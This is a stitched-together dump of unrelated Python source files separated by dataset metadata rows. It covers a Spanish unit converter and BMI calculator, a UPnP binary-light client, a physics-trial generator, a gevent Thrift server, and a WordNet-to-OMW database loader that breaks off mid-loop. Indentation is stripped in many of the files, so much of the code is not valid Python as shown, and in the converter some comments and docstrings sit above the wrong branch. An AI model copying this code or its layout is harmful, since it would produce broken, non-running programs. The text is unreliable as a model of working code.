                    #the list; otherwise append 1
                    if(numero%2==0):
                        r.append(0)
                    else:
                        r.append(1)
                    #Integer division keeps the value a whole number
                    numero=numero//2
                #Reverse the list to obtain the true binary digits
                r.reverse()
                print (r)
        except ValueError:
            print("Las letras y los numeros decimales no se pueden convertir a binario")
        #Only numbers greater than 0 can be converted to binary
respuesta=int(input("¿Quieres ingresar otro numero? (Si[1] No[0])"))
print ("")
elif (n==13): #Hexadecimal to Binary (error handling still pending)
print ("HEXADECIMAL -> BINARIO")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Hexadecimal a Binario---")
print ("(1) Escriba una cifra en sistema hexadecimal [Numeros y A,B,C,D,E,F son admitidos]. Luego presionar 'Enter'")
print ("(2) El programá realizará los calculos necesarios para convertir la cifra en binario")
print ("(3) Como resultado se imprimirá el resultado en 1 y 0; Digitos del sistema binario")
print ("")
numero = input("Ingresa un valor hexadecimal :")
print ("-"*50)
a=len(numero)
binnario=0
letras=""
while (binnario < a):
letras=letras+HaB(numero[binnario])
binnario+=1
print ("Tu valor en binario es: ", letras)
""" En esta funcion se puede calcular un numero de hexadecimal a un numero decimal
comenzando por iniciar un ciclo que niegue letras fuera del patron del hexadecima
en este caso solo se permiten de la A a la F."""
elif (n==14): #Hexadecimal a Decimal
print ("HEXADECIMAL -> DECIMAL")
print ("")
    hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
    print ("")
    if (hlp=="h" or hlp=="H"):
        print ("---Ayuda de Hexadecimal -> Decimal---")
        print ("(1) Escriba una cifra en sistema hexadecimal [Numeros y A,B,C,D,E,F son admitidos]")
        print ("(2) Presione 'Enter' para que el programa lo convierta a decimal")
        print ("(3) Como resultado, se mostrara el numero en sistema decimal")
        print ("")
    # Validate the input by attempting the base-16 parse itself
    print ("Que numero hexadecimal quiere convertir: ")
    hexdec=(input("Ingresa el numero en hexadecimal: "))
    while (True):
        try:
            dec = int(hexdec, 16)
            break
        except ValueError:
            print ("No es una letra valida")
            hexdec=(input("Ingresa el numero en hexadecimal: "))
    print (hexdec + " en Decimal es: " + str(dec) +"\n")
"""METROS A YARDAS
Con esta conversion podras facilmente convertir la medida de metro a yardas
Se solicita la cantidad de metros que el usuario quiere transformar luego
multiplica esa cantidad por metro(1)/yarda(.914) y muestra el resultado """
elif (n==15): #Metros a Yardas (Falta completar)
print ("METROS -> YARDAS")
    hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
    print ("")
    if (hlp=="h" or hlp=="H"):
        print ("---Ayuda de Metros -> Yardas---")
print ("(1) Escriba la cantidad de metros que desea convertir")
print ("(2) Presione 'Enter' para que el programa lo convierta a Yardas")
print ("(3) Como resultado, se mostrara la conversi[on de metros(m) a yardas(yd)")
print ("")
    #Ask for the number of meters to convert
    metros=input("¿Cuantos metros quieres convertir a yardas? ")
    while (not metros.isdigit()):
        #If the field was left empty or invalid, ask again
        print ("")
        print ("Porfavor escoja no deje ese espacio vacio ")
        metros=input("¿Cuantos metros quieres convertir a yardas? ")
    #Do the conversion: 1 yard = 0.9144 m
    conversion= int(metros)*(1/0.9144)
    #Print the result
    print ("Sus metros en yardas son: "+ str(conversion)+"yd")
"""YARDAS A METROS
Con esta funcion podras transformar Yardas(yd) a Metros(m) en base a una operacion
basada en regla de 3; multiplicando el numero de yardas por el el equivalente de
un metro pero en medias de yardas y dividiendoloe entre 1 para asi mostrar la conversion"""
elif (n==16): #yardas a metros
print ("YARDAS -> METROS")
    hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
    print ("")
    if (hlp=="h" or hlp=="H"):
        print ("---Ayuda de Yardas -> Metros---")
print ("(1) Escriba la cantidad de yardas que desea convertir")
print ("(2) Presione 'Enter' para que el programa lo convierta a Metros")
print ("(3) Como resultado, se mostrara la conversion de Yardas(yd) a Metros(m)")
print ("")
    #Ask for the number of yards to convert
    yardas=input("Ingrese el numero de Yardas que quiere transformar a metros: ")
    while (not yardas.isdigit()):
        #If the user left it blank or typed letters, ask again
        print("Porfavor no deje ese espacio en blanco")
        yardas=input("Podria ingresar otra vez el numero?: ")
    #Do the conversion: 1 yard = 0.9144 m
    Conversion= int(yardas)*0.9144
    #Print the result
    print ("Sus yardas transformadas a metros son: "+str(Conversion)+"m")
"""CALCULADORA DE IMC
El proposito de esta funcion es el de calcular el indice de masa corporal del usuario.
Los datos del usuario (Peso y Altura) se utilizan como variables para obtener el dato.
El peso se divide entre la altura en metros al cuadrado."""
elif (n==17): #Meters to Inches
print ("Bienvenido al convertidor Metros a Pulgada")
pulgada=39.3700787402
m=(input("Cuantos metros quiere convertir? "))
#Validate: reject blanks and negatives (only digit strings pass isdigit)
while (not m.isdigit()):
print("Porfavor ingrese un numero entero no negativo")
m=(input("Cuantos metros quiere convertir? "))
operacion=pulgada*int(m)
print (operacion)
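# Worked example (sketch): 2 m -> 2 * 39.3700787402 ≈ 78.74 in.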
elif(n==18):#Inches to Meters
print ("Bienvenido al convertidor Pulgadas a Metros")
p=int(input("Cuantas pulgadas quiere convertir? "))
me=0.0254
operacion=me*int(p)
print (operacion)
"""BMI CALCULATOR
The purpose of this function is to compute the user's body mass index.
The user's data (weight and height) are used as variables to obtain the
value: the weight in kg is divided by the height in meters squared."""
elif (n==19): #BMI Calculator
print ("CALCULADORA DE INDICE DE MASA CORPORAL")
print ("")
hlp=str(input("Para iniciar la funcion presione 'Enter', pero si no sabe como funciona o necesita ayuda, presione 'h': "))
print ("")
if (hlp=="h" or hlp=="H"):
print ("---Ayuda de Calculadora de IMC---")
print ("(1) Ingrese su peso en kg. [Kilogramo: 1kg = 1000gr.]")
print ("(2) Ingrese su altura en mt. [Metro: 1mt. = 100cm.]")
print ("(3) Como resultado, el programa le dira su indice de masa corporal.")
print ("")
#Ask for the user's weight
pes=(input("Ingrese su peso en Kg (Kilogramos): "))
while (not pes.isdigit()):
#If the input is invalid, ask again
print ("Solo se aceptan numeros.")
print ("")
pes=(input("Ingrese su peso en Kg (Kilogramos): "))
#Convert the amount to an integer
pes=int(pes)
#Ask the user for their height in centimeters
alt=(input("Ingrese su altura en Cm (Centimetros): "))
while (not alt.isdigit()):
#If the input is invalid, ask again
print ("Solo se aceptan numeros.")
print ("")
alt=(input("Ingrese su altura en Cm (Centimetros): "))
#Convert the height to a float
alt=float(alt)
#Compute the BMI: weight (kg) divided by height (m) squared
imc=(pes/((alt/100)**2))
#Show the result
print ("Su IMC es de: "+str(imc))
print ("")
else:
print ("No existe ese valor")
#Example commit
|
gpl-3.0
| 2,029,962,430,459,301,400
| 40.139053
| 153
| 0.612203
| false
| 2.982618
| false
| false
| false
|
palfrey/coherence
|
coherence/upnp/devices/binary_light_client.py
|
1
|
2116
|
# Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# Copyright 2008, Frank Scholz <coherence@beebits.net>
from coherence.upnp.services.clients.switch_power_client import SwitchPowerClient
from coherence import log
import coherence.extern.louie as louie
class BinaryLightClient(log.Loggable):
logCategory = 'binarylight_client'
def __init__(self, device):
self.device = device
self.device_type,self.version = device.get_device_type().split(':')[3:5]
self.icons = device.icons
self.switch_power = None
self.detection_completed = False
louie.connect(self.service_notified, signal='Coherence.UPnP.DeviceClient.Service.notified', sender=self.device)
for service in self.device.get_services():
if service.get_type() in ["urn:schemas-upnp-org:service:SwitchPower:1"]:
self.switch_power = SwitchPowerClient(service)
self.info("BinaryLight %s" % (self.device.get_friendly_name()))
if self.switch_power:
self.info("SwitchPower service available")
else:
self.warning("SwitchPower service not available, device not implemented properly according to the UPnP specification")
def remove(self):
self.info("removal of BinaryLightClient started")
if self.switch_power is not None:
self.switch_power.remove()
def service_notified(self, service):
self.info("Service %r sent notification" % service)
if self.detection_completed:
return
if self.switch_power is not None:
if not hasattr(self.switch_power.service, 'last_time_updated'):
return
if self.switch_power.service.last_time_updated is None:
return
self.detection_completed = True
louie.send('Coherence.UPnP.DeviceClient.detection_completed', None,
client=self,udn=self.device.udn)
def state_variable_change( self, variable):
self.info(variable.name, 'changed from', variable.old_value, 'to', variable.value)
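# Example usage (sketch; 'device' is a Coherence DeviceClient device object,
# and set_target is a hypothetical SwitchPowerClient method):
#   client = BinaryLightClient(device)
#   if client.switch_power:
#       client.switch_power.set_target(1)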
|
mit
| 4,234,525,556,472,552,400
| 38.185185
| 130
| 0.657845
| false
| 3.933086
| false
| false
| false
|
kasmith/cbmm-project-christmas
|
python-trials/batchMakeTrials.py
|
1
|
6661
|
from __future__ import division, print_function
from physicsTable import *
from physicsTable.constants import *
import threading
import pygame as pg
import random, os, sys
import numpy as np
import json
defVel = 300
# modified trial folder:
#trialfolder = os.path.join('..','public_html','trials')
trialfolder = os.path.join('..','psiturk-rg','templates', 'trials')
#random.seed(10001)
def makeRect(ul, lr):
return pg.Rect(ul, (lr[0]-ul[0],lr[1]-ul[1]))
def checkOverlap(trial):
walls = [makeRect(w[0],w[1]) for w in trial.normwalls]
goals = [makeRect(g[0],g[1]) for g in trial.goals]
objs = walls + goals
b = trial.ball
if b is not None:
br = makeRect((b[0][0]-b[2],b[1][0]-b[2]),(b[2]*2,b[2]*2))
objs.append(br)
for i in range(len(objs) - 1):
o = objs[i]
cls = o.collidelist(objs[(i+1):])
if cls != -1: return True
return False
def checkCoverage(trial, minsteps = 20, FPS = 40.):
tb = trial.makeTable()
notcovered = True
covered = False
ncovs = 0
while tb.step(1/FPS) is None:
if tb.fullyOcc():
notcovered = False
ncovs += 1
if ncovs >= minsteps: covered = True
else: ncovs = 0
return [notcovered, covered]
def checkSmallVel(v):
# True when the velocity is within pi/40 of the horizontal or vertical axis
x = abs(v[0])
y = abs(v[1])
if x == 0: return True # vertical motion: avoid division by zero in arctan
atan = np.arctan(y/x)
return (atan < np.pi/40) or (atan > 19*np.pi/40)
def MakeRandTrial(name, blocks, occs, covered = False, blockdims = (50,300), occdims = (150, 400), res = (1000, 620), maxfails = 10000):
retry_flag = True
while retry_flag:
fails = 0
chk = False
tr = RedGreenTrial(name, res, def_ball_vel = defVel)
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addGoal(pos,lr,REDGOAL,RED)
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addGoal(pos,lr,GREENGOAL,GREEN)
if checkOverlap(tr):
fails += 1
tr.goals = [tr.goals[0]]
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
for i in range(blocks):
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
tr.addWall(pos,lr)
if checkOverlap(tr):
fails += 1
tr.normwalls = tr.normwalls[:-1]
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
for i in range(occs):
chk = False
while not chk:
blocksize = (random.randint(blockdims[0],blockdims[1]),random.randint(blockdims[0],blockdims[1]))
pos = (random.randint(0,res[0]-blocksize[0]),random.randint(0,res[1]-blocksize[1]))
lr = (pos[0]+blocksize[0],pos[1]+blocksize[1])
noc = pg.Rect(pos,blocksize)
if noc.collidelist([makeRect(o[0],o[1]) for o in tr.occs]) == -1:
tr.addOcc(pos,lr)
chk = True
else:
fails += 1
bsize = tr.dbr
chk = False
while not chk:
bpos = (random.randint(bsize, res[0]-bsize), random.randint(bsize,res[1]-bsize))
vchk = False
while not vchk:
bvel = (random.random(), random.random())
if not checkSmallVel(bvel): vchk = True
tr.addBall(bpos, bvel)
if checkOverlap(tr):
fails += 1
tr.ball = None
else: chk = True
if fails > maxfails:
print("Resetting trial")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
tr.normalizeVel()
if not tr.checkConsistency(maxsteps=10000):
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
if tr.checkConsistency(maxsteps=3000):
print("Too short")
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
coverage = checkCoverage(tr)
if covered:
if not coverage[1]:
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
else:
if not coverage[0]:
#return MakeRandTrial(name,blocks,occs,covered,blockdims,occdims,res,maxfails)
continue
retry_flag = False
return tr
def threadMakeTrial(nTrials, b):
for i in range(nTrials):
nm = "RTr_Bl" + str(b) + "_" + str(i)
output_path = os.path.join(output_dir, nm + '.ptr')
if not os.path.exists(output_path):
print('Thread ' + str(b) + ': Trial ' + nm, file=sys.stderr)
t = MakeRandTrial(nm, b, 0)
t.save(output_path, askoverwrite=False)
if __name__ == '__main__':
# First arg is number of trials, since there will be
# 5 block variations for each trial, expect an effective
# total of 5*nTrials.
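# Example invocation (sketch): `python batchMakeTrials.py 20` writes trials
# named RTr_Bl<blocks>_<i>.ptr (blocks 1-5, i 0-19) into ./trials.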
if len(sys.argv) > 1:
nTrials = int(sys.argv[1])
else:
nTrials = 20
# Create directory for output files
output_dir = 'trials'
if not os.path.exists(output_dir):
os.makedirs(output_dir)
threads = []
# Make random trials
for b in range(1,6):
thr = threading.Thread(target=threadMakeTrial, args=(nTrials, b))
thr.start()
threads.append(thr)
for thread in threads:
thread.join()
|
mit
| 3,735,357,943,701,721,600
| 33.692708
| 136
| 0.545714
| false
| 3.471079
| false
| false
| false
|
ezbake/ezbake-frontend
|
ezReverseProxy/TSSLSocket/TGeventServer.py
|
1
|
1758
|
# Copyright (C) 2013-2014 Computer Sciences Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import gevent
from thrift.server.TServer import TServer
from thrift.transport import TSocket, TTransport
import gevent.socket
TSocket.socket = gevent.socket
class TGEventServer(TServer):
def __init__(self, logger, *args, **kwargs):
TServer.__init__(self, *args)
self._logger = logger
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransport.TTransportException, e:
pass
itrans.close()
otrans.close()
def serve(self):
self.serverTransport.listen()
while True:
try:
client = self.serverTransport.accept()
gevent.spawn(self.handle, client)
except KeyboardInterrupt:
raise
except Exception, e:
self._logger.exception(e)
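# Example wiring (sketch; MyService/handler are hypothetical Thrift artifacts):
#   processor = MyService.Processor(handler)
#   transport = TSocket.TServerSocket(port=9090)
#   server = TGEventServer(logger, processor, transport,
#                          TTransport.TBufferedTransportFactory(),
#                          TBinaryProtocol.TBinaryProtocolFactory())
#   server.serve()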
|
apache-2.0
| 8,150,297,926,331,764,000
| 34.16
| 76
| 0.663823
| false
| 4.277372
| false
| false
| false
|
fcbond/OMW
|
omw/bin/load-pwn.py
|
1
|
18238
|
#!/usr/bin/python3
# This script loads PWN in the new OMW schema
# It requires Python3 and NLTK3 installed
import sqlite3, sys, nltk
from nltk.corpus import wordnet as wn
from collections import defaultdict as dd
### ToDo: add antonyms as synset links (?)
### ToDo: examples are being loaded as synset examples, change to sense (?)
# It takes one argument: the name of the db
if (len(sys.argv) != 3):
sys.stderr.write('usage: load-pwn.py DBFILE ILIMAP\n')
sys.exit(1)
else:
u = sys.argv[0]
dbfile = sys.argv[1]
ilimapfile = sys.argv[2]
sys.stderr.write('Found ({}) as the new OMW database.\n'.format(dbfile))
# Verb Frames Names per Verb_id
vframe = dd(lambda: dd(str))
vframe['eng'][1] = "Something ----s"
vframe['eng'][2] = "Somebody ----s"
vframe['eng'][3] = "It is ----ing"
vframe['eng'][4] = "Something is ----ing PP"
vframe['eng'][5] = "Something ----s something Adjective/Noun"
vframe['eng'][6] = "Something ----s Adjective/Noun"
vframe['eng'][7] = "Somebody ----s Adjective"
vframe['eng'][8] = "Somebody ----s something"
vframe['eng'][9] = "Somebody ----s somebody"
vframe['eng'][10] = "Something ----s somebody"
vframe['eng'][11] = "Something ----s something"
vframe['eng'][12] = "Something ----s to somebody"
vframe['eng'][13] = "Somebody ----s on something"
vframe['eng'][14] = "Somebody ----s somebody something"
vframe['eng'][15] = "Somebody ----s something to somebody"
vframe['eng'][16] = "Somebody ----s something from somebody"
vframe['eng'][17] = "Somebody ----s somebody with something"
vframe['eng'][18] = "Somebody ----s somebody of something"
vframe['eng'][19] = "Somebody ----s something on somebody"
vframe['eng'][20] = "Somebody ----s somebody PP"
vframe['eng'][21] = "Somebody ----s something PP"
vframe['eng'][22] = "Somebody ----s PP"
vframe['eng'][23] = "Somebody's (body part) ----s"
vframe['eng'][24] = "Somebody ----s somebody to INFINITIVE"
vframe['eng'][25] = "Somebody ----s somebody INFINITIVE"
vframe['eng'][26] = "Somebody ----s that CLAUSE"
vframe['eng'][27] = "Somebody ----s to somebody"
vframe['eng'][28] = "Somebody ----s to INFINITIVE"
vframe['eng'][29] = "Somebody ----s whether INFINITIVE"
vframe['eng'][30] = "Somebody ----s somebody into V-ing something"
vframe['eng'][31] = "Somebody ----s something with something"
vframe['eng'][32] = "Somebody ----s INFINITIVE"
vframe['eng'][33] = "Somebody ----s VERB-ing"
vframe['eng'][34] = "It ----s that CLAUSE"
vframe['eng'][35] = "Something ----s INFINITIVE "
# Verb Frames Symbols per Verb_id
vframe['engsym'][1] = "☖ ~"
vframe['engsym'][2] = "☺ ~"
vframe['engsym'][3] = "It is ~ing"
vframe['engsym'][4] = "☖ is ~ing PP"
vframe['engsym'][5] = "☖ ~ ☖ Adj/N"
vframe['engsym'][6] = "☖ ~ Adj/N"
vframe['engsym'][7] = "☺ ~ Adj"
vframe['engsym'][8] = "☺ ~ ☖"
vframe['engsym'][9] = "☺ ~ ☺"
vframe['engsym'][10] = "☖ ~ ☺"
vframe['engsym'][11] = "☖ ~ ☖"
vframe['engsym'][12] = "☖ ~ to ☺"
vframe['engsym'][13] = "☺ ~ on ☖"
vframe['engsym'][14] = "☺ ~ ☺ ☖"
vframe['engsym'][15] = "☺ ~ ☖ to ☺"
vframe['engsym'][16] = "☺ ~ ☖ from ☺"
vframe['engsym'][17] = "☺ ~ ☺ with ☖"
vframe['engsym'][18] = "☺ ~ ☺ of ☖"
vframe['engsym'][19] = "☺ ~ ☖ on ☺"
vframe['engsym'][20] = "☺ ~ ☺ PP"
vframe['engsym'][21] = "☺ ~ ☖ PP"
vframe['engsym'][22] = "☺ ~ PP"
vframe['engsym'][23] = "☺'s (body part) ~"
vframe['engsym'][24] = "☺ ~ ☺ to INF"
vframe['engsym'][25] = "☺ ~ ☺ INF"
vframe['engsym'][26] = "☺ ~ that CLAUSE"
vframe['engsym'][27] = "☺ ~ to ☺"
vframe['engsym'][28] = "☺ ~ to INF"
vframe['engsym'][29] = "☺ ~ whether INF"
vframe['engsym'][30] = "☺ ~ ☺ into Ving ☖"
vframe['engsym'][31] = "☺ ~ ☖ with ☖"
vframe['engsym'][32] = "☺ ~ INF"
vframe['engsym'][33] = "☺ ~ V-ing"
vframe['engsym'][34] = "It ~ that CLAUSE"
vframe['engsym'][35] = "☖ ~ INF "
lexnames = """0 adj.all all adjective clusters
1 adj.pert relational adjectives (pertainyms)
2 adv.all all adverbs
3 noun.Tops unique beginner for nouns
4 noun.act nouns denoting acts or actions
5 noun.animal nouns denoting animals
6 noun.artifact nouns denoting man-made objects
7 noun.attribute nouns denoting attributes of people and objects
8 noun.body nouns denoting body parts
9 noun.cognition nouns denoting cognitive processes and contents
10 noun.communication nouns denoting communicative processes and contents
11 noun.event nouns denoting natural events
12 noun.feeling nouns denoting feelings and emotions
13 noun.food nouns denoting foods and drinks
14 noun.group nouns denoting groupings of people or objects
15 noun.location nouns denoting spatial position
16 noun.motive nouns denoting goals
17 noun.object nouns denoting natural objects (not man-made)
18 noun.person nouns denoting people
19 noun.phenomenon nouns denoting natural phenomena
20 noun.plant nouns denoting plants
21 noun.possession nouns denoting possession and transfer of possession
22 noun.process nouns denoting natural processes
23 noun.quantity nouns denoting quantities and units of measure
24 noun.relation nouns denoting relations between people or things or ideas
25 noun.shape nouns denoting two and three dimensional shapes
26 noun.state nouns denoting stable states of affairs
27 noun.substance nouns denoting substances
28 noun.time nouns denoting time and temporal relations
29 verb.body verbs of grooming, dressing and bodily care
30 verb.change verbs of size, temperature change, intensifying, etc.
31 verb.cognition verbs of thinking, judging, analyzing, doubting
32 verb.communication verbs of telling, asking, ordering, singing
33 verb.competition verbs of fighting, athletic activities
34 verb.consumption verbs of eating and drinking
35 verb.contact verbs of touching, hitting, tying, digging
36 verb.creation verbs of sewing, baking, painting, performing
37 verb.emotion verbs of feeling
38 verb.motion verbs of walking, flying, swimming
39 verb.perception verbs of seeing, hearing, feeling
40 verb.possession verbs of buying, selling, owning
41 verb.social verbs of political and social activities and events
42 verb.stative verbs of being, having, spatial relations
43 verb.weather verbs of raining, snowing, thawing, thundering
44 adj.ppl participial adjectives"""
# Short and Full Lexnames per Lexid
lexname = dd(lambda: dd(str))
for line in lexnames.split('\n'):
lexnlst = line.split('\t')
lexname['eng'][lexnlst[1]] = lexnlst[2]
lexname['id'][lexnlst[1]] = lexnlst[0]
################################################################
# OPEN omw.db
################################################################
con = sqlite3.connect(dbfile)
c = con.cursor()
################################################################
# GET PWN3.0-ILI ORIGINAL MAPPING
################################################################
f = open(ilimapfile, 'r')
ili_map = dict()
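# Expected ILI map line format (assumption, inferred from the parsing below):
#   "i1740<TAB>00001740-a" -> ili_id "1740", pwn_ss "00001740-a"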
for line in f:
if line.strip() == "":
continue
else:
tab = line.split('\t')
pwn_ss = tab[1].strip()
ili_id = tab[0][1:].strip()
ili_map[pwn_ss] = ili_id
################################################################
# INSERT PROJECT / SRC / SRC_META DATA
################################################################
c.execute("""INSERT INTO proj (code, u)
VALUES (?,?)""", ['pwn',u])
c.execute("""SELECT MAX(id) FROM proj""")
proj_id = c.fetchone()[0]
sys.stderr.write('PWN was attributed ({}) as proj_id.\n'.format(proj_id))
c.execute("""INSERT INTO src (proj_id, version, u)
VALUES (?,?,?)""", [proj_id,'3.0', u])
c.execute("""SELECT MAX(id) FROM src""")
src_id = c.fetchone()[0]
sys.stderr.write('PWN30 was attributed (%s) as src_id.\n' % (src_id))
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'id', 'pwn', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'version', '3.0', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'label', 'Princeton Wordnet', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'url', 'https://wordnet.princeton.edu', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'description', 'WordNet is a large, open-source, lexical database of English. Nouns, verbs, adjectives and adverbs are grouped into sets of cognitive synonyms (synsets), each expressing a distinct concept. Synsets are interlinked by means of conceptual-semantic and lexical relations.', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'license', 'wordnet', u])
c.execute("""INSERT INTO src_meta (src_id, attr, val, u)
VALUES (?,?,?,?)""", [src_id, 'language', 'en', u])
sys.stderr.write('PWN30 meta-data was added.\n')
################################################################
# INSERT (WN-EXTERNAL) RESOURCE DATA
################################################################
# FIXME!!! ADD SRC_META
c.execute("""INSERT INTO resource (code, u)
VALUES (?,?)""", ['pwn30-lexnames',u])
c.execute("""SELECT MAX(id) FROM resource""")
lexnames_resource_id = c.fetchone()[0]
c.execute("""INSERT INTO resource (code, u)
VALUES (?,?)""", ['pwn30-verbframes',u])
c.execute("""SELECT MAX(id) FROM resource""")
verbframes_resource_id = c.fetchone()[0]
################################################################
# INSERT LANG DATA (CODES AND NAMES)
################################################################
c.execute("""INSERT INTO lang (bcp47, iso639, u)
VALUES (?,?,?)""", ['en','eng',u])
c.execute("""INSERT INTO lang_name (lang_id, in_lang_id, name, u)
VALUES (1,1,'English',?)""", [u])
c.execute("""SELECT MAX(id) FROM lang""")
lang_id = c.fetchone()[0]
################################################################
# LOAD POS, SSREL, AND SREL DATA
################################################################
pos_id = dict()
c.execute("""SELECT id, tag FROM pos""")
rows = c.fetchall()
for r in rows:
pos_id[r[1]]=r[0]
ssrel_id = dict()
c.execute("""SELECT id, rel FROM ssrel""")
rows = c.fetchall()
for r in rows:
ssrel_id[r[1]]=r[0]
srel_id = dict()
c.execute("""SELECT id, rel FROM srel""")
rows = c.fetchall()
for r in rows:
srel_id[r[1]]=r[0]
################################################################
# ADD ENGLISH ENTRIES
################################################################
ssid = dict()
fid = dict()
wid=dict()
ss_lemma_sense_id = dict()
def ss2of(ss):
# FIXME!!!! 's' is getting through as the src_key on purpose!
return "%08d-%s" % (ss.offset(), ss.pos())
for ss in wn.all_synsets():
ili_id = int(ili_map[ss2of(ss)])
# (1) LOAD PWN CONCEPTS AS ILI CONCEPTS
if ss.instance_hypernyms():
kind = 2
c.execute("""INSERT INTO ili (id, kind_id, def, status_id,
origin_src_id, src_key, u)
VALUES (?,?,?,?,?,?,?)
""", (ili_id, kind, ss.definition(), 1,
src_id, ss2of(ss), u))
else:
kind = 1
c.execute("""INSERT INTO ili (id, kind_id, def, status_id,
origin_src_id, src_key, u)
VALUES (?,?,?,?,?,?,?)
""", (ili_id, kind, ss.definition(), 1,
src_id, ss2of(ss), u))
# (2) LOAD PWN CONCEPTS AS OMW CONCEPTS
pos = ss.pos()
pid = pos_id[pos.replace('s', 'a')]
# SYNSETS
c.execute("""INSERT INTO ss (ili_id, pos_id, u)
VALUES (?,?,?)
""", (ili_id, pid, u))
ss_id = c.lastrowid
c.execute("""INSERT INTO ss_src (ss_id, src_id, src_key, conf, u)
VALUES (?,?,?,?,?)
""", (ss_id, src_id, ss2of(ss), 1, u))
ssid[ss2of(ss)] = ss_id
c.execute("""INSERT INTO def (ss_id, lang_id, def, u)
VALUES (?,?,?,?)
""", (ss_id, lang_id, ss.definition(), u))
def_id = c.lastrowid
c.execute("""INSERT INTO def_src (def_id, src_id, conf, u)
VALUES (?,?,?,?)
""", (def_id, src_id, 1, u))
# EXAMPLES
exs = ss.examples()
for e in exs:
c.execute("""INSERT INTO ssexe (ss_id, lang_id, ssexe, u)
VALUES (?,?,?,?)
""", (ss_id, lang_id, e, u))
ex_id = c.lastrowid
c.execute("""INSERT INTO ssexe_src (ssexe_id, src_id, conf, u)
VALUES (?,?,?,?)
""", (ex_id, src_id, 1, u))
# INSERT FORMS, WORDS (SAME) and SENSES
for l in ss.lemmas():
# FORMS
form = l.name().replace('_', ' ')
if (pid, form) in fid:
form_id = fid[(pid, form)]
word_id = wid[(pid, form)] # look up the existing word id, not the whole dict
else:
c.execute("""INSERT INTO f (lang_id, pos_id, lemma, u)
VALUES (?,?,?,?)
""", (lang_id, pid, form, u))
form_id = c.lastrowid
fid[(pid, form)] = form_id
c.execute("""INSERT INTO f_src (f_id, src_id, conf, u)
VALUES (?,?,?,?)
""", (form_id, src_id, 1, u))
# WORDS Only add for new form/pos pairs
c.execute("""INSERT INTO w (canon, u)
VALUES (?,?) """, (form_id, u))
word_id = c.lastrowid
wid[(pid, form)] = word_id
c.execute("""INSERT INTO wf_link (w_id, f_id, src_id, conf, u)
VALUES (?,?,?,?,?)
""", (word_id, form_id, src_id, 1, u))
# SENSES
word_id = wid[(pid, form)]
c.execute("""INSERT INTO s (ss_id, w_id, u)
VALUES (?,?,?) """, (ss_id, word_id, u))
s_id = c.lastrowid
c.execute("""INSERT INTO s_src (s_id, src_id, conf, u)
VALUES (?,?,?,?) """, (s_id, src_id, 1, u))
ss_lemma_sense_id[(ss,l)] = s_id
################################################################
# SECOND ROUND: INSERT RELATIONS
################################################################
# This now includes all relations as named in NLTK3.0
nltk_synlink_names = """also also_sees
attribute attributes
causes causes
entails entailments
hypernym hypernyms
hyponym hyponyms
instance_hypernym instance_hypernyms
instance_hyponym instance_hyponyms
holo_part part_holonyms
mero_part part_meronyms
similar similar_tos
holo_substance substance_holonyms
mero_substance substance_meronyms
holo_member member_holonyms
mero_member member_meronyms
domain_topic topic_domains
domain_region region_domains
exemplifies usage_domains"""
synlinks = dict()
for line in nltk_synlink_names.splitlines():
(k, v) = line.split('\t')
synlinks[k] = v
# list with relations not present in NLTK3.0
# but that can be inserted by finding their reverse
linkrev = dict()
linkrev['domain_topic'] = 'has_domain_topic'
linkrev['exemplifies'] = 'is_exemplified_by'
linkrev['domain_region'] = 'has_domain_region'
nltk_senslink_names = """antonym antonyms
pertainym pertainyms
derivation derivationally_related_forms"""
senslinks = dict()
for line in nltk_senslink_names.splitlines():
